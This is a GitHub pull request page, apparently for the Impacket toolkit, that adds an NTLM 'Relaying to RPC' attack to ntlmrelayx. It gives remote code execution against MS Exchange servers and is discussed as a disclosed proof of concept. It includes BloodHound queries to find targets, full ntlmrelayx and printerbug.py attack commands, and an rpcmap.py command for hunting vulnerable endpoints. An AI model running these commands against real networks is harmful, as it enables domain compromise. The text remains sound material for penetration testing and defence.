Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We鈥檒l occasionally send you account related emails.

Already on GitHub? Sign in to your account

Added Relaying to RPC support #857

Merged
merged 1 commit into from May 20, 2020
Merged

Added Relaying to RPC support #857

merged 1 commit into from May 20, 2020

Conversation

@mohemiv
Copy link
Contributor

@mohemiv mohemiv commented May 15, 2020

Hello there,

This PR implements Relaying to RPC attack which currently allows RCE in any MS Exchange via Exchange Trusted Subsystem group (Exchange servers have Administrator rights to each other via this or similar group) and printerbug.py.

Queries for BloodHound to locate exploitation chains

MATCH p=(a:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(b:Computer) RETURN p
MATCH p=(a:Computer)-[r:AdminTo]->(b:Computer) RETURN p

Those queries show all machines that have Administrator rights to other machines.

Usage Option 1
Relaying incoming connections to RPC over TCP/IP endpoints (also known as ncacn_ip_tcp endpoints):

# Console 1
sudo ntlmrelayx.py -smb2support -c whoami -t rpc://EXCHANGE1-ADDR
# Console 2
python2 ./printerbug.py test@EXCHANGE2-ADDR {your_ip}

It requires 135/tcp port and a dynamic high MSRPC TCP port of TSCH service to be available on the target host.

Usage Option 2
Relaying incoming connections to RPC over SMB endpoints (also known as ncacn_np endpoints or the IPC$ share):

# Console 1
sudo ntlmrelayx.py -smb2support -c whoami -t rpc://EXCHANGE1-ADDR -rpc-use-smb -auth-smb 'CONTOSO/test:P@ssw0rd'
# Console 2
python2 ./printerbug.py test@EXCHANGE2-ADDR {your_ip}

It requires only 445/tcp port (or 139/tcp port) to be available on the target host, and the connection will be encrypted if SMB3 is used. A low-privilege account is needed.

Description
My original complete patch: https://gist.github.com/mohemiv/ab542e4ff5d8fedda790e35326705bad
MD5SUM from May 2, 2020: https://twitter.com/_mohemiv/status/1256636651780087809

This is the same attack that Compass Security has published (https://twitter.com/compasssecurity/status/1260898906629529602), but it was discovered before the Compass Security publication, so I just share my PoC because no other POCs have been released.

This PoC was also sent to MS including an example of relaying to DCOM MMC20 object.

For @CompassSecurity, it will be interesting to see your RPC Server and ways to get an incoming RPC connection 馃槑


June update
Relaying to DCOM activation service is patched.

If you are reading this and interested in finding new MSRPC endpoints to attack, check out new rpcmap.py tool with -auth-level 2 flag:

rpcmap.py -auth-rpc 'CONTOSO/user01:P@ssw0rd' 'ncacn_ip_tcp:10.0.0.1[52352]' -auth-level 2

The available such way endpoints should be vulnerable to RPC Relaying attack.

@mohemiv mohemiv changed the title Added Reaying to RPC support Added Relaying to RPC support May 15, 2020
@0xdeaddood
Copy link
Contributor

@0xdeaddood 0xdeaddood commented May 20, 2020

Hey @mohemiv! Great addition! It works like a charm!

@asolino
Copy link
Collaborator

@asolino asolino commented May 20, 2020

Thanks a lot for the addition @mohemiv and @0xdeaddood for testing it. Merging!

@asolino asolino merged commit 3f1e7dd into SecureAuthCorp:master May 20, 2020
1 check passed
1 check passed
@travis-ci
Travis CI - Pull Request Build Passed
Details
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

3 participants